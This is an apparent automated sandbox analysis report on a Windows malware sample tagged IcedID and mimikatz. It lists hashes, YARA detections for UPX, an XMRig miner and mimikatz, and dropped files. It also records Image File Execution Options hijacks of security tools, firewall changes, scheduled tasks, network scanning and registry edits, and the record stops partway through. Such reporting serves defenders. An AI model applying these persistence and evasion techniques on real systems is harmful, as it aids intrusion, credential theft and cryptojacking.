Analysis
-
max time kernel
150s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
28/05/2024, 10:27
Behavioral task
behavioral1
Sample
2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe
Resource
win7-20240221-en
General
-
Target
2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe
-
Size
9.0MB
-
MD5
03d0de4cda4efd31f762aadf487b7aec
-
SHA1
aeb5d2ef2ba2ba6a24ece954442d236caaabf872
-
SHA256
6f1e9522dd1dee1eb3bcd140f3d4cd61ab3cf7bfd8fdaabb8d1dec4834be3713
-
SHA512
a40209a7f055317ece2ce295bd0dcc2b8c186f131f37e73fb93a02e4a87e733b9a82cc3b2c43968fa7e3d04ef7dc50e4d6c38262b20cd9c9c018186c1f1683c5
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2524 created 2140 2524 ncnrnqz.exe 38 -
Contacts a large (30386) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
resource yara_rule behavioral2/memory/3016-138-0x00007FF63A910000-0x00007FF63A9FE000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore -
UPX dump on OEP (original entry point) 43 IoCs
resource yara_rule behavioral2/memory/4740-0-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/memory/4740-4-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/files/0x00080000000235bb-6.dat UPX behavioral2/memory/4576-8-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/files/0x00070000000235f9-134.dat UPX behavioral2/memory/3016-136-0x00007FF63A910000-0x00007FF63A9FE000-memory.dmp UPX behavioral2/memory/3016-138-0x00007FF63A910000-0x00007FF63A9FE000-memory.dmp UPX behavioral2/files/0x0007000000023603-141.dat UPX behavioral2/memory/3340-142-0x00007FF771380000-0x00007FF7713DB000-memory.dmp UPX behavioral2/memory/3340-150-0x00007FF771380000-0x00007FF7713DB000-memory.dmp UPX behavioral2/files/0x0007000000023602-163.dat UPX behavioral2/memory/4168-164-0x00007FF702680000-0x00007FF7027A0000-memory.dmp UPX behavioral2/memory/2416-171-0x00007FF771380000-0x00007FF7713DB000-memory.dmp UPX behavioral2/memory/4156-175-0x00007FF771380000-0x00007FF7713DB000-memory.dmp UPX behavioral2/memory/2296-179-0x00007FF771380000-0x00007FF7713DB000-memory.dmp UPX behavioral2/memory/4168-182-0x00007FF702680000-0x00007FF7027A0000-memory.dmp UPX behavioral2/memory/4256-184-0x00007FF771380000-0x00007FF7713DB000-memory.dmp UPX behavioral2/memory/3584-188-0x00007FF771380000-0x00007FF7713DB000-memory.dmp UPX behavioral2/memory/4428-192-0x00007FF771380000-0x00007FF7713DB000-memory.dmp UPX behavioral2/memory/4168-194-0x00007FF702680000-0x00007FF7027A0000-memory.dmp UPX behavioral2/memory/3064-197-0x00007FF771380000-0x00007FF7713DB000-memory.dmp UPX behavioral2/memory/4168-200-0x00007FF702680000-0x00007FF7027A0000-memory.dmp UPX behavioral2/memory/4892-202-0x00007FF771380000-0x00007FF7713DB000-memory.dmp UPX behavioral2/memory/1056-206-0x00007FF771380000-0x00007FF7713DB000-memory.dmp UPX behavioral2/memory/4532-210-0x00007FF771380000-0x00007FF7713DB000-memory.dmp UPX behavioral2/memory/4168-212-0x00007FF702680000-0x00007FF7027A0000-memory.dmp UPX behavioral2/memory/3228-215-0x00007FF771380000-0x00007FF7713DB000-memory.dmp UPX behavioral2/memory/4052-219-0x00007FF771380000-0x00007FF7713DB000-memory.dmp UPX behavioral2/memory/4168-221-0x00007FF702680000-0x00007FF7027A0000-memory.dmp UPX behavioral2/memory/2704-224-0x00007FF771380000-0x00007FF7713DB000-memory.dmp UPX behavioral2/memory/3028-228-0x00007FF771380000-0x00007FF7713DB000-memory.dmp UPX behavioral2/memory/4168-232-0x00007FF702680000-0x00007FF7027A0000-memory.dmp UPX behavioral2/memory/4260-234-0x00007FF771380000-0x00007FF7713DB000-memory.dmp UPX behavioral2/memory/4776-236-0x00007FF771380000-0x00007FF7713DB000-memory.dmp UPX behavioral2/memory/4728-238-0x00007FF771380000-0x00007FF7713DB000-memory.dmp UPX behavioral2/memory/6344-250-0x00007FF771380000-0x00007FF7713DB000-memory.dmp UPX behavioral2/memory/4168-251-0x00007FF702680000-0x00007FF7027A0000-memory.dmp UPX behavioral2/memory/3324-253-0x00007FF771380000-0x00007FF7713DB000-memory.dmp UPX behavioral2/memory/4168-254-0x00007FF702680000-0x00007FF7027A0000-memory.dmp UPX behavioral2/memory/4168-255-0x00007FF702680000-0x00007FF7027A0000-memory.dmp UPX behavioral2/memory/4168-257-0x00007FF702680000-0x00007FF7027A0000-memory.dmp UPX behavioral2/memory/4168-260-0x00007FF702680000-0x00007FF7027A0000-memory.dmp UPX behavioral2/memory/4168-262-0x00007FF702680000-0x00007FF7027A0000-memory.dmp UPX -
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/4168-182-0x00007FF702680000-0x00007FF7027A0000-memory.dmp xmrig behavioral2/memory/4168-194-0x00007FF702680000-0x00007FF7027A0000-memory.dmp xmrig behavioral2/memory/4168-200-0x00007FF702680000-0x00007FF7027A0000-memory.dmp xmrig behavioral2/memory/4168-212-0x00007FF702680000-0x00007FF7027A0000-memory.dmp xmrig behavioral2/memory/4168-221-0x00007FF702680000-0x00007FF7027A0000-memory.dmp xmrig behavioral2/memory/4168-232-0x00007FF702680000-0x00007FF7027A0000-memory.dmp xmrig behavioral2/memory/4168-251-0x00007FF702680000-0x00007FF7027A0000-memory.dmp xmrig behavioral2/memory/4168-254-0x00007FF702680000-0x00007FF7027A0000-memory.dmp xmrig behavioral2/memory/4168-255-0x00007FF702680000-0x00007FF7027A0000-memory.dmp xmrig behavioral2/memory/4168-257-0x00007FF702680000-0x00007FF7027A0000-memory.dmp xmrig behavioral2/memory/4168-260-0x00007FF702680000-0x00007FF7027A0000-memory.dmp xmrig behavioral2/memory/4168-262-0x00007FF702680000-0x00007FF7027A0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/4740-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4740-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x00080000000235bb-6.dat mimikatz behavioral2/memory/4576-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/3016-138-0x00007FF63A910000-0x00007FF63A9FE000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts ncnrnqz.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts ncnrnqz.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2316 netsh.exe 4128 netsh.exe -
Sets file execution options in registry 2 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ncnrnqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ncnrnqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe ncnrnqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ncnrnqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe ncnrnqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ncnrnqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe ncnrnqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ncnrnqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe ncnrnqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe ncnrnqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ncnrnqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ncnrnqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ncnrnqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ncnrnqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe ncnrnqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe ncnrnqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ncnrnqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe ncnrnqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ncnrnqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe ncnrnqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ncnrnqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ncnrnqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe ncnrnqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ncnrnqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ncnrnqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe ncnrnqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe ncnrnqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ncnrnqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe ncnrnqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe ncnrnqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe ncnrnqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ncnrnqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe ncnrnqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe ncnrnqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe ncnrnqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe ncnrnqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ncnrnqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe ncnrnqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ncnrnqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ncnrnqz.exe -
Executes dropped EXE 31 IoCs
pid Process 4576 ncnrnqz.exe 2524 ncnrnqz.exe 3016 wpcap.exe 1924 illedyzmr.exe 3016 vfshost.exe 3340 mtlvznziz.exe 3792 xohudmc.exe 2008 yqiwma.exe 4168 jrvvrz.exe 2416 mtlvznziz.exe 4156 mtlvznziz.exe 2296 mtlvznziz.exe 4256 mtlvznziz.exe 3584 mtlvznziz.exe 4428 mtlvznziz.exe 3064 mtlvznziz.exe 4892 mtlvznziz.exe 1056 mtlvznziz.exe 4532 mtlvznziz.exe 3228 mtlvznziz.exe 4052 mtlvznziz.exe 2704 mtlvznziz.exe 3028 mtlvznziz.exe 4620 ncnrnqz.exe 4260 mtlvznziz.exe 4776 mtlvznziz.exe 4728 mtlvznziz.exe 4052 gepmrvmba.exe 6344 mtlvznziz.exe 3324 mtlvznziz.exe 6356 ncnrnqz.exe -
Loads dropped DLL 12 IoCs
pid Process 3016 wpcap.exe 3016 wpcap.exe 3016 wpcap.exe 3016 wpcap.exe 3016 wpcap.exe 3016 wpcap.exe 3016 wpcap.exe 3016 wpcap.exe 3016 wpcap.exe 1924 illedyzmr.exe 1924 illedyzmr.exe 1924 illedyzmr.exe -
resource yara_rule behavioral2/files/0x00070000000235f9-134.dat upx behavioral2/memory/3016-136-0x00007FF63A910000-0x00007FF63A9FE000-memory.dmp upx behavioral2/memory/3016-138-0x00007FF63A910000-0x00007FF63A9FE000-memory.dmp upx behavioral2/files/0x0007000000023603-141.dat upx behavioral2/memory/3340-142-0x00007FF771380000-0x00007FF7713DB000-memory.dmp upx behavioral2/memory/3340-150-0x00007FF771380000-0x00007FF7713DB000-memory.dmp upx behavioral2/files/0x0007000000023602-163.dat upx behavioral2/memory/4168-164-0x00007FF702680000-0x00007FF7027A0000-memory.dmp upx behavioral2/memory/2416-171-0x00007FF771380000-0x00007FF7713DB000-memory.dmp upx behavioral2/memory/4156-175-0x00007FF771380000-0x00007FF7713DB000-memory.dmp upx behavioral2/memory/2296-179-0x00007FF771380000-0x00007FF7713DB000-memory.dmp upx behavioral2/memory/4168-182-0x00007FF702680000-0x00007FF7027A0000-memory.dmp upx behavioral2/memory/4256-184-0x00007FF771380000-0x00007FF7713DB000-memory.dmp upx behavioral2/memory/3584-188-0x00007FF771380000-0x00007FF7713DB000-memory.dmp upx behavioral2/memory/4428-192-0x00007FF771380000-0x00007FF7713DB000-memory.dmp upx behavioral2/memory/4168-194-0x00007FF702680000-0x00007FF7027A0000-memory.dmp upx behavioral2/memory/3064-197-0x00007FF771380000-0x00007FF7713DB000-memory.dmp upx behavioral2/memory/4168-200-0x00007FF702680000-0x00007FF7027A0000-memory.dmp upx behavioral2/memory/4892-202-0x00007FF771380000-0x00007FF7713DB000-memory.dmp upx behavioral2/memory/1056-206-0x00007FF771380000-0x00007FF7713DB000-memory.dmp upx behavioral2/memory/4532-210-0x00007FF771380000-0x00007FF7713DB000-memory.dmp upx behavioral2/memory/4168-212-0x00007FF702680000-0x00007FF7027A0000-memory.dmp upx behavioral2/memory/3228-215-0x00007FF771380000-0x00007FF7713DB000-memory.dmp upx behavioral2/memory/4052-219-0x00007FF771380000-0x00007FF7713DB000-memory.dmp upx behavioral2/memory/4168-221-0x00007FF702680000-0x00007FF7027A0000-memory.dmp upx behavioral2/memory/2704-224-0x00007FF771380000-0x00007FF7713DB000-memory.dmp upx behavioral2/memory/3028-228-0x00007FF771380000-0x00007FF7713DB000-memory.dmp upx behavioral2/memory/4168-232-0x00007FF702680000-0x00007FF7027A0000-memory.dmp upx behavioral2/memory/4260-234-0x00007FF771380000-0x00007FF7713DB000-memory.dmp upx behavioral2/memory/4776-236-0x00007FF771380000-0x00007FF7713DB000-memory.dmp upx behavioral2/memory/4728-238-0x00007FF771380000-0x00007FF7713DB000-memory.dmp upx behavioral2/memory/6344-250-0x00007FF771380000-0x00007FF7713DB000-memory.dmp upx behavioral2/memory/4168-251-0x00007FF702680000-0x00007FF7027A0000-memory.dmp upx behavioral2/memory/3324-253-0x00007FF771380000-0x00007FF7713DB000-memory.dmp upx behavioral2/memory/4168-254-0x00007FF702680000-0x00007FF7027A0000-memory.dmp upx behavioral2/memory/4168-255-0x00007FF702680000-0x00007FF7027A0000-memory.dmp upx behavioral2/memory/4168-257-0x00007FF702680000-0x00007FF7027A0000-memory.dmp upx behavioral2/memory/4168-260-0x00007FF702680000-0x00007FF7027A0000-memory.dmp upx behavioral2/memory/4168-262-0x00007FF702680000-0x00007FF7027A0000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 79 ifconfig.me 80 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData ncnrnqz.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\yqiwma.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 ncnrnqz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies ncnrnqz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft ncnrnqz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache ncnrnqz.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2326C1864DE719190C396A6E8734D8B4 ncnrnqz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2326C1864DE719190C396A6E8734D8B4 ncnrnqz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 ncnrnqz.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\yqiwma.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE ncnrnqz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content ncnrnqz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 ncnrnqz.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File opened for modification C:\Windows\kvialcmr\ncnrnqz.exe 2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe File created C:\Windows\ctvlnlili\UnattendGC\specials\svschost.exe ncnrnqz.exe File created C:\Windows\ctvlnlili\UnattendGC\specials\vimpcsvc.exe ncnrnqz.exe File created C:\Windows\ctvlnlili\UnattendGC\svschost.xml ncnrnqz.exe File created C:\Windows\ctvlnlili\UnattendGC\schoedcl.xml ncnrnqz.exe File created C:\Windows\kvialcmr\svschost.xml ncnrnqz.exe File opened for modification C:\Windows\kvialcmr\docmicfg.xml ncnrnqz.exe File opened for modification C:\Windows\kvialcmr\schoedcl.xml ncnrnqz.exe File created C:\Windows\ctvlnlili\rzvrtrlue\illedyzmr.exe ncnrnqz.exe File created C:\Windows\ctvlnlili\UnattendGC\specials\ssleay32.dll ncnrnqz.exe File created C:\Windows\ctvlnlili\rzvrtrlue\ip.txt ncnrnqz.exe File created C:\Windows\ctvlnlili\UnattendGC\specials\spoolsrv.xml ncnrnqz.exe File created C:\Windows\kvialcmr\spoolsrv.xml ncnrnqz.exe File created C:\Windows\ctvlnlili\Corporate\mimilib.dll ncnrnqz.exe File created C:\Windows\ctvlnlili\upbdrjv\swrpwe.exe ncnrnqz.exe File created C:\Windows\ctvlnlili\UnattendGC\specials\tucl-1.dll ncnrnqz.exe File created C:\Windows\ctvlnlili\UnattendGC\specials\vimpcsvc.xml ncnrnqz.exe File created C:\Windows\ime\ncnrnqz.exe ncnrnqz.exe File created C:\Windows\ctvlnlili\rzvrtrlue\wpcap.dll ncnrnqz.exe File created C:\Windows\ctvlnlili\UnattendGC\specials\coli-0.dll ncnrnqz.exe File created C:\Windows\ctvlnlili\UnattendGC\specials\libeay32.dll ncnrnqz.exe File created C:\Windows\ctvlnlili\UnattendGC\specials\posh-0.dll ncnrnqz.exe File opened for modification C:\Windows\ctvlnlili\rzvrtrlue\Result.txt gepmrvmba.exe File created C:\Windows\ctvlnlili\UnattendGC\specials\xdvl-0.dll ncnrnqz.exe File created C:\Windows\ctvlnlili\UnattendGC\specials\svschost.xml ncnrnqz.exe File opened for modification C:\Windows\kvialcmr\spoolsrv.xml ncnrnqz.exe File opened for modification C:\Windows\kvialcmr\vimpcsvc.xml ncnrnqz.exe File created C:\Windows\ctvlnlili\rzvrtrlue\wpcap.exe ncnrnqz.exe File created C:\Windows\ctvlnlili\UnattendGC\spoolsrv.xml ncnrnqz.exe File opened for modification C:\Windows\kvialcmr\svschost.xml ncnrnqz.exe File created C:\Windows\kvialcmr\ncnrnqz.exe 2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe File created C:\Windows\ctvlnlili\UnattendGC\specials\cnli-1.dll ncnrnqz.exe File created C:\Windows\kvialcmr\vimpcsvc.xml ncnrnqz.exe File opened for modification C:\Windows\ctvlnlili\Corporate\log.txt cmd.exe File created C:\Windows\kvialcmr\schoedcl.xml ncnrnqz.exe File created C:\Windows\ctvlnlili\Corporate\mimidrv.sys ncnrnqz.exe File created C:\Windows\ctvlnlili\rzvrtrlue\scan.bat ncnrnqz.exe File created C:\Windows\ctvlnlili\UnattendGC\specials\trch-1.dll ncnrnqz.exe File created C:\Windows\ctvlnlili\UnattendGC\specials\ucl.dll ncnrnqz.exe File created C:\Windows\ctvlnlili\UnattendGC\specials\spoolsrv.exe ncnrnqz.exe File created C:\Windows\ctvlnlili\UnattendGC\specials\docmicfg.xml ncnrnqz.exe File created C:\Windows\ctvlnlili\UnattendGC\docmicfg.xml ncnrnqz.exe File created C:\Windows\kvialcmr\docmicfg.xml ncnrnqz.exe File created C:\Windows\ctvlnlili\rzvrtrlue\gepmrvmba.exe ncnrnqz.exe File created C:\Windows\ctvlnlili\UnattendGC\specials\libxml2.dll ncnrnqz.exe File created C:\Windows\ctvlnlili\UnattendGC\specials\zlib1.dll ncnrnqz.exe File created C:\Windows\ctvlnlili\UnattendGC\vimpcsvc.xml ncnrnqz.exe File created C:\Windows\ctvlnlili\rzvrtrlue\Packet.dll ncnrnqz.exe File opened for modification C:\Windows\ctvlnlili\rzvrtrlue\Packet.dll ncnrnqz.exe File created C:\Windows\ctvlnlili\UnattendGC\specials\crli-0.dll ncnrnqz.exe File created C:\Windows\ctvlnlili\Corporate\vfshost.exe ncnrnqz.exe File created C:\Windows\ctvlnlili\UnattendGC\specials\trfo-2.dll ncnrnqz.exe File created C:\Windows\ctvlnlili\UnattendGC\specials\docmicfg.exe ncnrnqz.exe File created C:\Windows\ctvlnlili\UnattendGC\specials\schoedcl.xml ncnrnqz.exe File created C:\Windows\ctvlnlili\UnattendGC\Shellcode.ini ncnrnqz.exe File created C:\Windows\ctvlnlili\UnattendGC\specials\exma-1.dll ncnrnqz.exe File created C:\Windows\ctvlnlili\UnattendGC\specials\tibe-2.dll ncnrnqz.exe File created C:\Windows\ctvlnlili\UnattendGC\specials\schoedcl.exe ncnrnqz.exe File created C:\Windows\ctvlnlili\UnattendGC\AppCapture64.dll ncnrnqz.exe File created C:\Windows\ctvlnlili\UnattendGC\AppCapture32.dll ncnrnqz.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1540 sc.exe 4352 sc.exe 1924 sc.exe 4700 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x00080000000235bb-6.dat nsis_installer_2 behavioral2/files/0x00080000000232ff-15.dat nsis_installer_1 behavioral2/files/0x00080000000232ff-15.dat nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4456 schtasks.exe 3372 schtasks.exe 3040 schtasks.exe -
Modifies data under HKEY_USERS 49 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software mtlvznziz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals mtlvznziz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mtlvznziz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mtlvznziz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ncnrnqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mtlvznziz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mtlvznziz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing mtlvznziz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mtlvznziz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mtlvznziz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ncnrnqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mtlvznziz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mtlvznziz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mtlvznziz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mtlvznziz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing ncnrnqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mtlvznziz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ncnrnqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mtlvznziz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ncnrnqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" 